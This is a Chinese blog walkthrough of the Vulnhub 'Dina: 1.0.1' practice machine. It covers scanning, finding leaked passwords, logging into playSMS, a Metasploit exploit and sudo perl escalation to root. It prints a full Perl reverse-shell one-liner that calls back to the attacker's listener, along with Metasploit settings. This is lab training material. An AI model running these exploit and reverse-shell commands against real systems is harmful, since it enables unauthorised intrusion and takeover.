Dina: 1.0.1

于 2024-09-29 16:26:13 发布
阅读量468 收藏 3
点赞数 17
文章标签: 网络 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78815619/article/details/142637503
版权

1.主机发现

arp-scan -l

2.端口扫描

nmap -p- -A -sV -Pn 192.168.119.150

这里看到只开放了80端口

3.目录扫描

dirsearch -u 192.168.119.150

4.Web访问

浏览器访问192.168.119.150,页面有个提交查询按钮,点击会跳转但没有什么有用的信息

拼接访问/robots.txt,发现一些接口

http://192.168.119.150/robots.txt

拼接访问/secure,发现这里有一个压缩包,直接下载下来看看

http://192.168.119.150/secure

解压需要密码,接下来寻找密码

接着通过测试发现,拼接访问/nothing时不是404页面,F12查看源代码发现疑似密码信息

http://192.168.119.150/nothing

#my secret pass
freedom
password
helloworld!
diana
iloveroot

接着去尝试解压,输入freedom解压成功,得到一个损坏的MP3文件

将其用记事本打开,发现一段话、一个用户名、一个加密密码和一个url

I am not toooo smart in computer .......dat the resoan i always choose 
easy password...with creds backup file....
 
uname: touhid
password: ******
 
 
url : /SecreTSMSgatwayLogin

这段话提示了这个用户的密码是一个简单密码,我们暂时猜测可能与刚才源代码中得到的密码有关

拼接访问url,得到一个登录界面

http://192.168.119.150/SecreTSMSgatwayLogin

尝试一番下来发现全都登不上,然后换了个浏览器等上去了,用户名就是刚刚得到的用户名,密码确实来自刚才那段源码

username:touhid
password:diana

登录之后直接看到CMSplaySMS,接下来利用MSF查看有无可利用漏洞

5.漏洞挖掘

kali中开启msf

msfconsole

查看CMS历史漏洞

search playSMS

经过尝试后,发现第二个可以利用,接下来尝试利用该漏洞来getshell

6.漏洞利用

use 2					#使用第二个漏洞
show options	#查看需要设置的选项

Required显示为yes的参数是必须设置的

set password diana                  #配置密码
set rhosts 192.168.119.150            #靶机ip
set targeturi /SecreTSMSgatwayLogin #配置上传文件页面的url  
set username touhid                 #配置账户       
set lhost 192.168.119.128             #监听者kali的ip       
set lport 6666                      #监听者kali的端口

设置完毕后再次查看一下选项,确认设置无误

show options

确认无误,直接run,成功getshell

python升级为交互式shell

shell
python -c 'import pty; pty.spawn("/bin/bash")'

7.权限提升

查看当前用户能执行的sudo命令

sudo -l

这里显示www-data用户可以不输入密码使用sudo命令执行/usr/bin/perl命令

接下来可以利用/usr/bin/perl命令,来获取root权限

首先kali开启监听

nc -lvvp 9999

然后通过perl命令写入反弹shell

sudo perl -e 'use Socket;$i="192.168.119.128";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

kali成功接收到反弹shell,提权成功

到这里还没结束,最终是要拿到/root/flag.txt文件

cat /root/flag.txt

________                                                _________
\________\--------___       ___         ____----------/_________/
    \_______\----\\\\\\   //_ _ \\    //-------/________/
        \______\----\\|| (( ~|~ )))  ||//------/________/
            \_____\---\\ ((\ = / ))) //----/_____/
                 \____\--\_)))  \ _)))---/____/
                       \__/  (((     (((_/
                          |  -)))  -  ))
 
 
root password is : hello@3210
easy one .....but hard to guess.....
but i think u dont need root password......
u already have root shelll....
 
 
CONGO.........
FLAG : 22d06624cd604a0626eb5a2992a6f2e6

0Deww
关注
M3dina:使用ASP.NET Core和IBM Blockchain Platform的电子引荐POC
05-11
**M3dina项目概述** M3dina是一个基于ASP.NET Core和IBM Blockchain Platform的电子推荐证明(Proof of Concept,POC)应用。这个项目利用了现代Web技术,如HTML5和JavaScript,以及后端的C#编程语言,旨在创建一个...
DINA Model and Parameter Estimation:A Didactic.pdf
05-30
根据提供的文件内容,我们可以了解到关于DINA模型和参数估计的相关知识点,以下是详细解析: 1. DINA模型(Deterministic Input, Noisy "and" gate model,确定性输入、噪声“与”门模型)是一个认知诊断模型...
靶机渗透测试(Dina: 1.0.1)
@小张小张的博客
12-07 1666
靶机渗透测试(): **Vulnhub靶机 ** 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。 靶机难度:(====) 描述:It wated for kTheBox flag进度:2/2 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 命令:netdiscover -i eth0 -r 192.168.10.0 靶机ip为: 192.168.10.133 2. nmap进行靶机端口服务扫描 命令:
Dina1.0.1复现
weixin_61982677的博客
09-24 551
发现是一个 playSMS 框架的后台页面,使用 msfconsole查看是否有可利用的框架漏洞 exp。,密码还是使用之前的密码本爆破,得到结果为 diana,登录成功进入到一个 playSMS 后台界面。虚拟机默认网络模式为桥接,将网络模式修改为与 kali 一样的 NAT 模式。拼接 URL 地址访问,是一个 login 页面,用户名为。解压发现需要密码,尝试之前搜集到的密码本,发现密码为。发现 5 个不允许访问的页面有一个密码本。发现一个 zip 文件,下载下来。发现一个上传文件页面。
Dina: 1.0.1靶机
m0_61995767的博客
08-05 444
Dina: 1.0.1打靶记录
Vulnhub靶机:Dina: 1.0.1
whoami
09-24 861
Vulnhub靶机:Dina: 1.0.1实战
Dina: 1.0.1(靶机渗透测试)
2301_78721909的博客
07-29 780
Dina: 1.0.1 靶机渗透测试(from wuhu)
Dina: 1.0.1靶场
最新发布
qq_64703089的博客
09-27 363
Dina靶场
Vulhub靶场之Dina-1.0.1
weixin_45650977的博客
04-30 928
Vulhub靶场之Dina-1.0.1 靶机描述 环境准备 vmware15 打开 攻击机:kali NAT模式 靶机:Dina1.0.1 NAT模式
vulnhub-1:Dina
qq_60384876的博客
02-20 991
Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚机到获取操作系统的root权限和查看flag。
Vulnhub-Dina-1.0.1入门靶机渗透
2401_83378606的博客
09-25 554
网卡这里需要与kali处于同一网段,我这里是kali是nat,靶机就改成nat。进来后发现是个登陆界面,刚刚还给了用户名,密码先试试之前找到的密码本,尝试登陆。带上耳机准备试听,发现文件好像损坏了,那应该是还有其他用处。准备试试弱口令突然想起来刚刚泄露的密码,拿过来试试。是这个页面外,其余都是空目录,那就先从这里入手。貌似只开放了80端口,且探测出了几个目录。那就去看看有没有可提权的payload。的字眼,去msf搜搜有没有相关的漏洞。双击打开下载好的.ova文件即可。进来是这样的,左上角有个。
nanoid-dart:Dina实施Ainanoid
05-07
纳米 DART实现 安装 添加nanoid作为 用法 普通的 import 'package:nanoid/nanoid.dart' ; void main () { var id = nanoid ();... var custom_length_id = nanoid ( 10 );... var id = customAlphabet ( '1234567890...
个人计算机与网络的安全
nn_84的博客
09-24 318
关于 wifi 大家都知道 wifi 已经使用了 wpa3 非常安全 但很多人不知道 pin 和 wps 这两项有漏洞。种漏洞来控制用户电脑 老实说吧 默认用户仍然是管理员 像windows 是很容易得到最高权限的。关于 病毒 大家都知道中国 美国 俄罗斯 的黑客不断的在对抗 所以这病毒花样百出 所以系统用户。关于 国产的 linux 老实说全是漏洞 默认开启 很多服务 但初始化的设置都有漏洞。我发现很多用户都简单设置了这两项 他们的设置 使他们的网络出现了漏洞。
【计算机网络 - 基础问题】每日 3 题(二十一)
Newin2020的博客
09-24 684
✍个人博客:Pandaconda-CSDN博客📣专栏地址:http://t.csdnimg.cn/fYaBd📚专栏简介:在这个专栏中,我将会分享 C++ 面试中常见的面试题给大家~📝推荐参考地址:https://www.xiaolincoding.com/(这个大佬的专栏非常有用!
Linux 网络安全守护:构建安全防线的最佳实践
weixin_62641226的博客
09-23 1008
通过定期更新系统、强化用户权限管理、配置防火墙、使用SSH安全连接、定期备份数据、监控系统日志以及安装安全工具,用户可以有效提升Linux系统的安全性,构建坚固的网络安全防线。Linux系统通常内置了防火墙工具,如`iptables`和`firewalld`。用户应根据实际需求,设置合适的规则,限制不必要的端口和服务。可以使用`rsync`、`tar`等工具进行备份,确保在发生安全事件时能够快速恢复。此外,定期审查用户账户和权限,及时删除不再使用的账户,确保只有必要的用户能够访问系统。
【在Linux世界中追寻伟大的One Piece】验证TCP
weixin_74809706的博客
09-22 1709
成功调用该函数后,Winsock库的状态会被初始化,应用程序就可以使用Winsock提供的一系列套接字服务,如地址家族识别、地址转换、名字查询和连接控制等。在调用WSAStartup函数后,如果应用程序完成了对请求的Socket库的使用,应调用WSACleanup函数来解除与Socket库的绑定并释放所占用的系统资源。这样,编译器就能够识别并理解Winsock2中定义的数据类型和函数,从而能够正确地编译和链接网络相关的代码。接受客户端的连接请求,并返回一个新的套接字描述符,用于与客户端进行通信。
BGP相关知识笔记
Richardlygo的博客
09-23 1245
整个网络规模扩大,路由数量进一步增加,路由表与LSDB规模变大,路由收敛变慢,设备性能消耗加大为此在AS之间专门使用BGP协议进行路由传递,相较于传统的IGP路由协议:BGP基于TCP,只要能够建立TCP连接即可建立BGP只传递路由信息,不会暴露AS内的拓扑3。
2024ICPC网络赛2记录:CK
zsyzClb的博客
09-25 244
不过看到异或就知道这个异或肯定不是白给你的,大概就是用字典树,一开始我以为是把两个数组分开建字典树,后面发现要一起建,然后就想到用dp来维护。这一把我们三个人手感都很好,前六题都是一遍过,然后我又切掉了非签到的E和C,最后时间不是很多,K只想到大概字典树的思路,细节不是很懂就直接开冲,当然是没有冲出来。我们想了很多错误的思路以后才开始思考kmp,然后就想到了可以一直跳kmp,只需要把相同的合并起来,如果能匹配的就全部一起跳过,不匹配的就直接删掉,时间复杂度O(n)。看上去要求某种匹配数的个数,有点吓人。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值